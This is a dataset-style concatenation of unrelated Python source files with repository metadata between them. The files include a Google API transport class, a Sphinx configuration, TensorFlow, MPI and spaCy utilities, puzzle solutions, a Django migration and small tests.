credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
# If the credentials is service account credentials, then always try to use self signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
and hasattr(service_account.Credentials, "with_always_use_jwt_access")
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
# TODO(busunkim): This method is in the base transport
# to avoid duplicating code across the transport classes. These functions
# should be deleted once the minimum required versions of google-auth is increased.
# TODO: Remove this function once google-auth >= 1.25.0 is required
@classmethod
def _get_scopes_kwargs(
cls, host: str, scopes: Optional[Sequence[str]]
) -> Dict[str, Optional[Sequence[str]]]:
"""Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
scopes_kwargs = {}
if _GOOGLE_AUTH_VERSION and (
packaging.version.parse(_GOOGLE_AUTH_VERSION)
>= packaging.version.parse("1.25.0")
):
scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
else:
scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}
return scopes_kwargs
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.search_migratable_resources: gapic_v1.method.wrap_method(
self.search_migratable_resources,
default_timeout=None,
client_info=client_info,
),
self.batch_migrate_resources: gapic_v1.method.wrap_method(
self.batch_migrate_resources,
default_timeout=None,
client_info=client_info,
),
}
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Return the client designed to process long-running operations."""
raise NotImplementedError()
@property
def search_migratable_resources(
self,
) -> Callable[
[migration_service.SearchMigratableResourcesRequest],
Union[
migration_service.SearchMigratableResourcesResponse,
Awaitable[migration_service.SearchMigratableResourcesResponse],
],
]:
raise NotImplementedError()
@property
def batch_migrate_resources(
self,
) -> Callable[
[migration_service.BatchMigrateResourcesRequest],
Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
]:
raise NotImplementedError()
__all__ = ("MigrationServiceTransport",)
|
[
"[email protected]"
] | |
2f320639bf0c7b231d588ce8050002ed8d7f888e
|
eb52ecd946dc6c2e4d7bd63a27bbfbc587ccbe79
|
/doc/source/conf.py
|
7da23a679516396f631dd434f1640595a4a9aab4
|
[
"Apache-2.0"
] |
permissive
|
dtroyer/osc-choochoo
|
5ee7b124b7c53c44aac5651dde950e11778e1653
|
57119ab84528933da9cbcd57dcd4f5b842a58186
|
refs/heads/master
| 2021-09-08T00:06:58.580823 | 2018-03-03T19:20:07 | 2018-03-03T19:36:37 | 103,709,841 | 1 | 1 |
Apache-2.0
| 2018-03-03T13:28:05 | 2017-09-15T23:34:08 |
Python
|
UTF-8
|
Python
| false | false | 2,903 |
py
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import pbr.version
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..')))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
#'sphinx.ext.intersphinx',
'openstackdocstheme',
'stevedore.sphinxext',
'cliff.sphinxext',
]
# openstackdocstheme options
repository_name = 'dtroyer/osc-choochoo'
bug_project = ''
bug_tag = ''
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'osc-choochoo'
copyright = u'2017 Dean Troyer'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'%s.tex' % project,
u'%s Documentation' % project,
u'OpenStack Foundation', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
|
[
"[email protected]"
] | |
eeca7667162158e4c128fc7a5beedc8e432f8d53
|
4882e66d296cb0e5dab21de1170e13f8c54a6c9c
|
/Exercicios/2-ex7.py
|
0e2b488de4c6e268228bb55c516ec4f10b0faca2
|
[] |
no_license
|
felipemanfrin/NLP
|
d6eac822fc919f93a1146c004540f62fe9c83086
|
45424ca49504d5f11e13f8d97829a0d5a9926bc2
|
refs/heads/master
| 2023-01-21T12:16:56.081979 | 2020-12-02T21:20:30 | 2020-12-02T21:20:30 | 268,633,901 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 581 |
py
|
import spacy
from spacy.matcher import Matcher
from spacy.matcher import PhraseMatcher
nlp = spacy.load('en_core_web_sm')
matcher = PhraseMatcher(nlp.vocab)
pattern = ['swimming vigorously']
phrase_patterns = [nlp(text) for text in pattern]
matcher.add('SwimmingVigorously', None, *phrase_patterns)
with open('../UPDATED_NLP_COURSE/TextFiles/owlcreek.txt') as f:
doc = nlp(f.read())
found_matches = matcher(doc)
for match_id, start, end in found_matches:
string_id = nlp.vocab[match_id]
span = doc[start+10:end+10]
print(match_id, string_id, start, end, span.text)
|
[
"[email protected]"
] | |
57af349162a6ec2e90c73196d07d293ccd657ef7
|
e97c5e5beb22444b7eabd743a35493ab6fd4cb2f
|
/nbs/15_gsa_gls/20-null_simulations/20_gls_phenoplier/profiling/py/01_03-gls-profiling-new_code.py
|
419a1aae91420228e40cf2683fc7fa6979628e86
|
[
"BSD-2-Clause-Patent"
] |
permissive
|
greenelab/phenoplier
|
bea7f62949a00564e41f73b361f20a08e2e77903
|
b0e753415e098e93a1f206bb90b103a97456a96f
|
refs/heads/main
| 2023-08-23T20:57:49.525441 | 2023-06-15T06:00:32 | 2023-06-22T16:12:37 | 273,271,013 | 5 | 2 |
NOASSERTION
| 2023-06-20T20:35:45 | 2020-06-18T15:13:58 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,943 |
py
|
# ---
# jupyter:
# jupytext:
# cell_metadata_filter: all,-execution,-papermill,-trusted
# formats: ipynb,py//py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.8
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# %% [markdown] tags=[]
# # Description
# %% [markdown] tags=[]
# It profiles some functions to compute the correlation between predicted gene expression. Each of these notebooks is supposed to be run in a particular changeset.
#
# **Before running this notebook**, make sure you are in this changeset:
# ```bash
# # the changes tried to improve the performance by activating lru_cache for method Gene._get_ssm_correlation
# git co fd3d476f0f4e53b8b8dfbe395dcf498c09b03aaf
# ```
# %%
# %load_ext line_profiler
# %% [markdown] tags=[]
# # Modules
# %% tags=[]
from entity import Gene
# %% [markdown]
# # Functions
# %%
def compute_ssm_correlation(all_genes):
res = []
for g1_idx, g1 in enumerate(all_genes[:-1]):
for g2 in all_genes[g1_idx:]:
c = g1.get_ssm_correlation(
g2,
reference_panel="1000G",
model_type="MASHR",
use_within_distance=False,
)
res.append(c)
return res
# %% [markdown]
# # Test case
# %%
gene1 = Gene(ensembl_id="ENSG00000180596")
gene2 = Gene(ensembl_id="ENSG00000180573")
gene3 = Gene(ensembl_id="ENSG00000274641")
gene4 = Gene(ensembl_id="ENSG00000277224")
all_genes = [gene1, gene2, gene3, gene4]
# %%
assert len(set([g.chromosome for g in all_genes])) == 1
# %% [markdown]
# # Run timeit
# %%
# %timeit compute_ssm_correlation(all_genes)
# %% [markdown]
# # Profile
# %%
# %prun -l 20 -s cumulative compute_ssm_correlation(all_genes)
# %%
# %prun -l 20 -s time compute_ssm_correlation(all_genes)
# %%
|
[
"[email protected]"
] | |
09b56da17b552a715728664e0d4b355d51787a27
|
179140ef3ac111af7645636b5408894a3b61094f
|
/camera_trap_classifier/data/tfr_encoder_decoder.py
|
2cf32feeda4cd2d78f8897e135b88d0269e7e2f9
|
[
"MIT"
] |
permissive
|
YunyiShen/camera-trap-classifier
|
1d9bc3431ed31a00edfcd8fa4323fcf110ecc514
|
95f5f2db1c61f401e2408b8a9bfb6c069fa1a98e
|
refs/heads/master
| 2020-12-04T06:42:24.552725 | 2020-01-03T23:01:44 | 2020-01-03T23:01:44 | 231,662,686 | 0 | 0 |
MIT
| 2020-01-03T20:47:03 | 2020-01-03T20:47:02 | null |
UTF-8
|
Python
| false | false | 7,590 |
py
|
""" Class To Encode and Decode TFRecords"""
import logging
import tensorflow as tf
from camera_trap_classifier.data.utils import (
wrap_int64, wrap_bytes, wrap_dict_bytes_list, wrap_dict_int64_list,
_bytes_feature_list,
_bytes_feature_list_str)
from camera_trap_classifier.data.image import decode_image_bytes_1D
logger = logging.getLogger(__name__)
class TFRecordEncoderDecoder(object):
""" Define Encoder and Decoder for a specific TFRecord file """
def __init__(self):
logger.info("Initializing TFRecordEncoderDecoder")
def encode_record(self, record_data):
raise NotImplementedError
def decode_record(self):
raise NotImplementedError
class DefaultTFRecordEncoderDecoder(TFRecordEncoderDecoder):
""" Default TFREncoder / Decoder """
def _convert_to_tfr_data_format(self, record):
""" Convert a record to a tfr format """
id = record['id']
n_images = record['n_images']
n_labels = record['n_labels']
image_paths = record['image_paths']
meta_data = record['meta_data']
label_text = record['labelstext']
labels = {k: v for k, v in record.items() if 'label/' in k}
labels_num = {k: v for k, v in record.items() if 'label_num/' in k}
label_features = wrap_dict_bytes_list(labels)
label_num_features = wrap_dict_int64_list(labels_num)
tfr_data = {
"id": wrap_bytes(tf.compat.as_bytes(id)),
"n_images": wrap_int64(n_images),
"n_labels": wrap_int64(n_labels),
"image_paths": _bytes_feature_list_str(image_paths),
"meta_data": wrap_bytes(tf.compat.as_bytes(meta_data)),
"labelstext": wrap_bytes(tf.compat.as_bytes(label_text)),
"images": _bytes_feature_list(record['images']),
**label_features,
**label_num_features
}
return tfr_data
def encode_record(self, record_data):
""" Encode Record to Serialized String """
tfr_data_dict = self._convert_to_tfr_data_format(record_data)
feature_attributes = set(['id', 'n_images', 'n_labels',
'meta_data', 'labelstext'])
feature_list_attributes = tfr_data_dict.keys() - feature_attributes
# Wrap the data as TensorFlow Features
feature_dict = {k: v for k, v in tfr_data_dict.items()
if k in feature_attributes}
feature = tf.train.Features(feature=feature_dict)
# Wrap lists as FeatureLists
feature_list_dict = {k: v for k, v in tfr_data_dict.items()
if k in feature_list_attributes}
feature_lists = tf.train.FeatureLists(feature_list=feature_list_dict)
# Wrap again as a TensorFlow Example.
example = tf.train.SequenceExample(
context=feature,
feature_lists=feature_lists)
# Serialize the data.
serialized = example.SerializeToString()
return serialized
def decode_record(self, serialized_example,
output_labels,
label_lookup_dict=None,
image_pre_processing_fun=None,
image_pre_processing_args=None,
image_choice_for_sets='random',
decode_images=True,
numeric_labels=False,
return_only_ml_data=True,
only_return_one_label=True
):
""" Decode TFRecord and return dictionary """
# fixed size Features - ID and labels
if return_only_ml_data:
context_features = {
'id': tf.FixedLenFeature([], tf.string)
}
else:
context_features = {
'id': tf.FixedLenFeature([], tf.string),
'n_images': tf.FixedLenFeature([], tf.int64),
'n_labels': tf.FixedLenFeature([], tf.int64),
'meta_data': tf.FixedLenFeature([], tf.string),
'labelstext': tf.FixedLenFeature([], tf.string)
}
# Extract labels (string and numeric)
label_names = ['label/' + l for l in output_labels]
label_features = {k: tf.FixedLenSequenceFeature([], tf.string)
for k in label_names}
label_num_names = ['label_num/' + l for l in output_labels]
label_num_features = {k: tf.FixedLenSequenceFeature([], tf.int64)
for k in label_num_names}
if return_only_ml_data:
if numeric_labels:
sequence_features = {
'images': tf.FixedLenSequenceFeature([], tf.string),
**label_num_features
}
else:
sequence_features = {
'images': tf.FixedLenSequenceFeature([], tf.string),
**label_features
}
else:
sequence_features = {
'images': tf.FixedLenSequenceFeature([], tf.string),
'image_paths': tf.FixedLenSequenceFeature([], tf.string),
**label_features,
**label_num_features
}
# Parse the serialized data so we get a dict with our data.
context, sequence = tf.parse_single_sequence_example(
serialized=serialized_example,
context_features=context_features,
sequence_features=sequence_features)
# determine label prefix for either numeric or string labels
if numeric_labels:
label_prefix = 'label_num/'
else:
label_prefix = 'label/'
# Wheter to return only the labels of the first observation or all
# and wheter to map string labels to integers using a lookup table
if only_return_one_label:
if label_lookup_dict is not None and not numeric_labels:
parsed_labels = {
k: tf.reshape(label_lookup_dict[k].lookup(v[0]), [1])
for k, v in sequence.items() if label_prefix in k}
else:
parsed_labels = {
k: v[0]
for k, v in sequence.items() if label_prefix in k}
else:
if label_lookup_dict is not None and not numeric_labels:
parsed_labels = {
k: label_lookup_dict[k].lookup(v)
for k, v in sequence.items() if label_prefix in k}
else:
parsed_labels = {
k: v
for k, v in sequence.items() if label_prefix in k}
if not decode_images:
return {**{k: v for k, v in context.items()},
**{k: v for k, v in sequence.items()
if label_prefix not in k},
**parsed_labels}
# decode 1-D tensor of raw images
image = decode_image_bytes_1D(
sequence['images'],
**image_pre_processing_args)
# Pre-Process image
if image_pre_processing_fun is not None:
image_pre_processing_args['image'] = image
image = image_pre_processing_fun(**image_pre_processing_args)
return ({'images': image},
{**{k: v for k, v in context.items()},
**{k: v for k, v in sequence.items()
if label_prefix not in k and 'images' not in k},
**parsed_labels})
|
[
"[email protected]"
] | |
93ee6822569c5b7e9169ffac1e02ef95e6d5c928
|
412b0612cf13e9e28b9ea2e625975f3d9a2f52b6
|
/2017/18/double_computer.py
|
15e82c468b7a8a9ed25058bcadfb08c381a40aa1
|
[] |
no_license
|
AlexClowes/advent_of_code
|
2cf6c54a5f58db8482d1692a7753b96cd84b6279
|
d2158e3a4edae89071e6a88c9e874a9a71d4d0ec
|
refs/heads/master
| 2022-12-24T19:02:07.815437 | 2022-12-23T17:35:53 | 2022-12-23T17:35:53 | 225,618,394 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,700 |
py
|
from collections import defaultdict
import operator
from queue import Queue
def prog(program, program_id, snd_queue, rcv_queue):
registers = defaultdict(int)
registers["p"] = program_id
value = lambda x: registers[x] if x.isalpha() else int(x)
instruction_pointer = 0
while 0 <= instruction_pointer < len(program):
op, *args = program[instruction_pointer].split()
if op == "set":
registers[args[0]] = value(args[1])
elif op in ("add", "mul", "mod"):
func = getattr(operator, op)
registers[args[0]] = func(registers[args[0]], value(args[1]))
elif op == "jgz":
if value(args[0]) > 0:
instruction_pointer += value(args[1]) - 1
elif op == "snd":
snd_queue.put(value(args[0]))
yield True
elif op == "rcv":
if rcv_queue.empty():
instruction_pointer -= 1
yield False
else:
registers[args[0]] = rcv_queue.get()
instruction_pointer += 1
def count_sends_before_blocking(prog):
ret = 0
while next(prog):
ret += 1
return ret
def run(program):
q0, q1 = Queue(), Queue()
prog0 = prog(program, 0, q0, q1)
prog1 = prog(program, 1, q1, q0)
total = 0
while True:
prog0_sends = count_sends_before_blocking(prog0)
prog1_sends = count_sends_before_blocking(prog1)
total += prog1_sends
if prog0_sends == prog1_sends == 0:
return total
def main():
with open("program.txt") as f:
program = [line.strip() for line in f]
print(run(program))
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
08f3bcef3f8cd09135340a9e0b5b59eba23f21d6
|
a6cba5b8b36f3f4ef80d7351725da0bc8ddbfad4
|
/NM/cp/main.py
|
e362e92e7130e9ddfb28811f5a86ec2d6613187c
|
[] |
no_license
|
tutkarma/mai_study
|
7de61a406c7c5701ea9bbea7da687cc147653e53
|
39359eb8b5701c752d1f4e8e0b26911e50df12ab
|
refs/heads/master
| 2023-03-15T18:28:05.814809 | 2022-01-18T08:40:39 | 2022-01-18T08:40:39 | 103,191,526 | 38 | 99 | null | 2023-03-04T02:20:21 | 2017-09-11T21:46:56 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 5,366 |
py
|
import argparse
import json
from utils import save_to_file
from mpi4py import MPI
import numpy as np
def read_data(filename, need_args):
init_dict = {}
with open(filename, 'r') as json_data:
data = json.load(json_data)[0] # !
for arg in need_args:
if arg not in data:
raise ValueError('No "{0}" in given data'.format(arg))
if arg == 'matrix':
init_dict[arg] = np.array(data[arg], dtype=np.float64)
else:
init_dict[arg] = data[arg]
return init_dict
def sign(n):
return 1 if n > 0 else -1
def t(A):
return np.sqrt(sum([A[i, j] ** 2 for i in range(A.shape[0])
for j in range(i + 1, A.shape[0])]))
def indexes_max_elem(A):
i_max = j_max = 0
a_max = A[0, 0]
for i in range(A.shape[0]):
for j in range(i + 1, A.shape[0]):
if abs(A[i, j]) > a_max:
a_max = abs(A[i, j])
i_max, j_max = i, j
return i_max, j_max
def parallel_jacobi_rotate(comm, A, ind_j, ind_k):
sz = A.shape[0]
rank = comm.Get_rank()
pool_size = comm.Get_size()
c = s = 0.0
j = k = 0
row_j, row_k = np.zeros(sz), np.zeros(sz)
if rank == 0:
j, k = ind_j, ind_k
if A[j, j] == A[k, k]:
c = np.cos(np.pi / 4)
s = np.sin(np.pi / 4)
else:
tau = (A[j, j] - A[k, k]) / (2 * A[j, k])
t = sign(tau) / (abs(tau) + np.sqrt(1 + tau ** 2))
c = 1 / np.sqrt(1 + t ** 2)
s = c * t
for i in range(sz):
row_j[i] = A[j, i]
row_k[i] = A[k, i]
j = comm.bcast(j, root=0)
k = comm.bcast(k, root=0)
c = comm.bcast(c, root=0)
s = comm.bcast(s, root=0)
comm.Bcast(row_j, root=0)
comm.Bcast(row_k, root=0)
row_j_comm = comm.Create_group(comm.group.Incl([i for i in range(1, pool_size) if i % 2 == 1]))
row_k_comm = comm.Create_group(comm.group.Incl([i for i in range(1, pool_size) if i % 2 == 0]))
row_j_rank = row_j_size = -1
row_j_new = np.zeros(sz)
if MPI.COMM_NULL != row_j_comm:
row_j_rank = row_j_comm.Get_rank()
row_j_size = row_j_comm.Get_size()
size = int(sz / row_j_size)
row_j_part = np.zeros(size)
row_k_part = np.zeros(size)
row_j_new_part = np.zeros(size)
row_j_comm.Scatter(row_j, row_j_part, root=0)
row_j_comm.Scatter(row_k, row_k_part, root=0)
for i in range(size):
row_j_new_part[i] = c * row_j_part[i] + s * row_k_part[i]
row_j_comm.Gather(row_j_new_part, row_j_new, root=0)
if row_j_rank == 0:
comm.Send([row_j_new, sz, MPI.FLOAT], dest=0, tag=0)
row_j_comm.Free()
row_k_rank = row_k_size = -1
row_k_new = np.zeros(sz)
if MPI.COMM_NULL != row_k_comm:
row_k_rank = row_k_comm.Get_rank()
row_k_size = row_k_comm.Get_size()
size = int(sz / row_k_size)
row_j_part = np.zeros(size)
row_k_part = np.zeros(size)
row_k_new_part = np.zeros(size)
row_k_comm.Scatter(row_j, row_j_part, root=0)
row_k_comm.Scatter(row_k, row_k_part, root=0)
for i in range(size):
row_k_new_part[i] = s * row_j_part[i] - c * row_k_part[i]
row_k_comm.Gather(row_k_new_part, row_k_new, root=0)
if row_k_rank == 0:
comm.Send([row_k_new, sz, MPI.FLOAT], dest=0, tag=0)
row_k_comm.Free()
if rank == 0:
status = MPI.Status()
comm.Recv([row_j_new, sz, MPI.FLOAT], source=1, tag=0, status=status)
comm.Recv([row_k_new, sz, MPI.FLOAT], source=2, tag=0, status=status)
A[j, k] = A[k, j] = (c ** 2 - s ** 2) * row_j[k] + s * c * (row_k[k] - row_j[j])
A[j, j] = c ** 2 * row_j[j] + 2 * s * c * row_j[k] + s ** 2 * row_k[k]
A[k, k] = s ** 2 * row_j[j] - 2 * s * c * row_j[k] + c ** 2 * row_k[k]
for i in range(sz):
if i != j and i != k:
A[j, i] = A[i, j] = row_j_new[i]
A[k, i] = A[i, k] = row_k_new[i]
return A
def jacobi_parallel(comm, A, eps):
elapsed_time = 0
i, j = indexes_max_elem(A)
norm = t(A)
rank = comm.Get_rank()
eps = comm.bcast(eps, root=0)
norm = comm.bcast(norm, root=0)
k = 1
while norm > eps:
elapsed_time -= MPI.Wtime()
A = parallel_jacobi_rotate(comm, A, j, i)
if rank == 0:
norm = t(A)
elapsed_time += MPI.Wtime()
norm = comm.bcast(norm, root=0)
i, j = indexes_max_elem(A)
k += 1
return np.diag(A).tolist()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--input', required=True, help='Input file')
parser.add_argument('--output', required=True, help='Output file')
args = parser.parse_args()
elapsed_time = 0
need_args = ('matrix', 'eps')
init_dict = read_data(args.input, need_args)
A, eps = init_dict['matrix'], init_dict['eps']
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
elapsed_time -= MPI.Wtime()
eig = jacobi_parallel(comm, A, eps)
elapsed_time += MPI.Wtime()
if rank == 0:
save_to_file(args.output, eigenvalues=eig)
print("Dimension {0}, time elapsed {1} sec.\n".format(A.shape[0], elapsed_time))
MPI.Finalize()
|
[
"[email protected]"
] | |
575d02aa9fb79160437e642f6d8501b4b1d3b89c
|
0f556b9d4e250df73bf1e0929dbd4afad51e82fe
|
/person/3/person.py
|
18a8f9d43f414810584c840c8d787016b5ca9207
|
[] |
no_license
|
unabl4/PythonCodeClub
|
0ef1cb4d145860a4fda528c2eea513d0ba6b8327
|
72d5887342c1e0b304307a0e0ac9eb78f0202c35
|
refs/heads/master
| 2021-04-30T04:42:03.266029 | 2019-02-18T22:09:12 | 2019-02-18T22:09:12 | 121,541,065 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 604 |
py
|
from datetime import date
class Person:
def __init__(self, first_name, last_name, birth_date):
self.first_name = first_name
self.last_name = last_name
self.birth_date = birth_date
def age(self):
return int((date.today()-self.birth_date).days // 365.25)
def full_name(self):
return "%s %s" % (self.first_name, self.last_name)
# ---
class Female(Person):
def __init__(self, first_name, last_name, birth_date):
super().__init__(first_name, last_name, birth_date)
def age(self):
age = super().age()
return min(20, age)
|
[
"[email protected]"
] | |
3705d6628ca7f9c0175c12c5e79138b0bc3be4c0
|
1eee2c9c105148904d0fb47cee227cfd20241b76
|
/alpha/alpha_beats_28.py
|
5bfdccc7f1e53b5628dc5209c82fea3bfca59b63
|
[] |
no_license
|
fred-hz/zeta
|
be9f6f466b75767cc1a45a4004d1c84e5d559b6b
|
e7b631447fff6e58928d6ac15702338b7cc8e3e7
|
refs/heads/master
| 2021-09-05T01:03:31.387379 | 2018-01-23T04:15:58 | 2018-01-23T04:15:58 | 118,187,345 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,281 |
py
|
from alpha.alpha_base import AlphaBase
import numpy as np
import util
class AlphaBeats_28(AlphaBase):
def initialize(self):
self.delay = int(self.params['delay'])
self.is_valid = self.context.is_valid
self.alpha = self.context.alpha
self.cps = self.context.fetch_data('adj_close')
self.low = self.context.fetch_data('adj_low')
def compute_day(self, di):
indicator = np.zeros(len(self.context.ii_list))
indicator.flat = np.nan
for ii in range(len(self.context.ii_list)):
if self.is_valid[di][ii]:
if np.where(-np.isnan(self.low[di - self.delay - np.arange(20), ii]))[0].size == 0:
continue
indicator[ii] = np.nanargmin(self.low[di-self.delay-np.arange(20), ii])
util.rank(indicator)
for ii in range(len(self.context.ii_list)):
if self.is_valid[di][ii]:
temp = np.nanmean(self.cps[di-self.delay-np.arange(5), ii])
if abs(temp) > 1e-5:
self.alpha[ii] = (temp - self.cps[di-self.delay][ii]) / temp * (indicator - 0.5)
def dependencies(self):
self.register_dependency('adj_close')
self.register_dependency('adj_low')
|
[
"[email protected]"
] | |
5f042357ce4755b0b73969f346665bf0304b6569
|
7d8a4d58fc4c5a73ce8c85e513253a86d6290d3b
|
/script.module.eggscrapers/lib/eggscrapers/modules/workers.py
|
0699f6d316130d4fa9ee280485fcae4f73959dcd
|
[] |
no_license
|
bopopescu/icon
|
cda26d4463d264b7e2080da51f29d84cc48dfb81
|
e385a6225dd11b7fea5a11215d655cf5006bb018
|
refs/heads/master
| 2022-01-12T19:00:04.951604 | 2019-07-10T05:35:44 | 2019-07-10T05:35:44 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 946 |
py
|
# -*- coding: utf-8 -*-
'''
Eggman Add-on
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import threading
class Thread(threading.Thread):
def __init__(self, target, *args):
self._target = target
self._args = args
threading.Thread.__init__(self)
def run(self):
self._target(*self._args)
|
[
"[email protected]"
] | |
9500aa334d1daba13d7d173c5f462b375f143dd5
|
d063684dd03293eb0f980568af088d26ab087dbe
|
/debadmin/migrations/0075_auto_20191108_1225.py
|
dd5f3b44bf87cdc1a4bd8999b7965e71e5bee1f2
|
[] |
no_license
|
abhaysantra/debscientific
|
ce88e5ef44da8d6771c3652ed0ad02900ccd8ed2
|
88ec65616fd24052bbdbba8b00beba85493f5aea
|
refs/heads/master
| 2020-11-26T22:09:33.820247 | 2019-12-20T07:58:43 | 2019-12-20T07:58:43 | 229,213,810 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,072 |
py
|
# Generated by Django 2.2.6 on 2019-11-08 06:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('debadmin', '0074_auto_20191107_1914'),
]
operations = [
migrations.AddField(
model_name='order_details',
name='cancel_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='order_details',
name='cancel_reason',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='order_details',
name='deliver_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='order_details',
name='return_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='order_details',
name='return_reason',
field=models.TextField(null=True),
),
]
|
[
"[email protected]"
] | |
8f06edb067427872d40d29ef97e33cffafcc5c31
|
56b36ddf920b5f43e922cb84e8f420f1ad91a889
|
/Leetcode/Leetcode-Minimum Area Rectangle.py
|
bac5a430a77fc7b720b63b147c68a99ab884d1bd
|
[] |
no_license
|
chithien0909/Competitive-Programming
|
9ede2072e85d696ccf143118b17638bef9fdc07c
|
1262024a99b34547a3556c54427b86b243594e3c
|
refs/heads/master
| 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 687 |
py
|
from collections import defaultdict
class Solution:
def minAreaRect(self, points) -> int:
if len(points) <= 3: return 0
x= defaultdict(set)
for xC, yC in points:
x[xC].add(yC)
m = float('inf')
for p1 in points:
for p2 in points:
if p1[0] == p2[0] or p1[1] == p2[1]:
continue
else:
if p2[1] in x[p1[0]] and p1[1] in x[p2[0]]:
t = abs(p1[0] - p2[0]) * abs(p1[1]-p2[1])
m = min(t,m)
return m if m < float('inf') else 0
s = Solution()
print(s.minAreaRect([[1,1],[1,3],[3,1],[3,3],[4,1],[4,3]]))
|
[
"[email protected]"
] | |
7a5f37ad2f3ff8cf53a9b3b4ca81d5f74320aa45
|
649078315f93e2d76fad95c59f234701ef055cb8
|
/test/test_baseSubscriber.py
|
820a50160e7e984fa738df7e2c5d59094e7878bd
|
[
"MIT"
] |
permissive
|
jaebradley/nba_player_news
|
207f4555f662c9187e9ab931774a0863556529f8
|
35ac64c369c33f1232fa76bd5bcc1c0704d868bb
|
refs/heads/master
| 2022-11-22T08:25:08.993567 | 2017-06-14T00:36:52 | 2017-06-14T00:36:52 | 89,762,719 | 2 | 0 |
MIT
| 2022-11-11T17:00:18 | 2017-04-29T04:06:01 |
Python
|
UTF-8
|
Python
| false | false | 353 |
py
|
from unittest import TestCase
from nba_player_news.data.subscribers import BaseSubscriber
class TestBaseSubscriber(TestCase):
subscriber = BaseSubscriber(subscription_channel_name="foo")
def expect_process_message_to_not_be_implemented(self):
self.assertRaises(NotImplementedError, self.subscriber.process_message(message="bar"))
|
[
"[email protected]"
] | |
46dfde8b2041244d6ae133d01572576d6944bc71
|
